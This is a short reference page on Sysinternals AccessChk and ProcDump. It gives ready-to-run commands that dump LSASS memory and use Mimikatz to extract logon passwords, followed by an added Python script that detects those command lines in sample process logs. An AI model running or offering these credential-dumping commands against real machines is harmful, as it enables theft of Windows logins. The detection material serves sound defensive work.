# PsTools / Sysinternals

### AccessChk

As part of ensuring that they've created a secure environment, Windows administrators often need to know what kind of access specific users or groups have to resources, including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output.

### ProcDump

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use) and unhandled exception monitoring, and it can generate dumps based on the values of system performance counters. It can also serve as a general process dump utility that you can embed in other scripts.

**Dump LSASS**

32-bit:

`procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp`

64-bit:

`procdump.exe -accepteula -ma -64 lsass.exe lsass.dmp`

Mimikatz can be used offline to read the contents of the LSASS dump, in particular the sections that contain logon passwords.

`mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit`
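
Both command lines above leave a recognisable trace in process-creation logging. The following is an added example, not part of the original page: a Python check that flags them by their arguments. The event tuples are constructed sample data, and the function names and finding labels are hypothetical.

```python
# Added example: flag the LSASS-dump command lines shown on this page.
# Function names and finding labels are hypothetical; events are constructed.

# Constructed (image, command line) pairs, as process-creation logging
# would record them. Image paths are placeholders.
SAMPLE_EVENTS = [
    (r"C:\Tools\procdump.exe",
     r"procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp"),
    (r"C:\Tools\procdump.exe",
     r"procdump.exe -accepteula -ma -64 lsass.exe lsass.dmp"),
    (r"C:\Tools\procdump.exe",
     r"procdump.exe -accepteula -ma w3wp.exe c:\dumps\w3wp.dmp"),
    (r"C:\Windows\System32\tasklist.exe",
     r'tasklist /fi "imagename eq lsass.exe"'),
    (r"C:\Tools\mimikatz.exe",
     r'mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit'),
]

LSASS_TARGETS = {"lsass", "lsass.exe"}


def classify(cmdline):
    """Return finding labels for one command line (empty list if none)."""
    # Split on whitespace and drop surrounding quotes so a quoted
    # argument still compares equal to the bare switch or process name.
    tokens = [t.strip('"').lower() for t in cmdline.split()]
    findings = []
    # ProcDump full dump (-ma) aimed at the LSASS process.
    if "-ma" in tokens and LSASS_TARGETS.intersection(tokens):
        findings.append("lsass-full-dump")
    # Mimikatz loading a minidump for offline parsing.
    if "sekurlsa::minidump" in cmdline.lower():
        findings.append("minidump-offline-parse")
    return findings


def scan(events):
    """Return (image, cmdline, findings) for every event that matched."""
    flagged = []
    for image, cmdline in events:
        findings = classify(cmdline)
        if findings:
            flagged.append((image, cmdline, findings))
    return flagged


if __name__ == "__main__":
    for image, cmdline, findings in scan(SAMPLE_EVENTS):
        print(f"{','.join(findings):<24} {image}  {cmdline}")
```

The full dump of `w3wp.exe` and the `tasklist` query are not flagged, because the first rule requires both the `-ma` switch and an LSASS target in the same command line.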

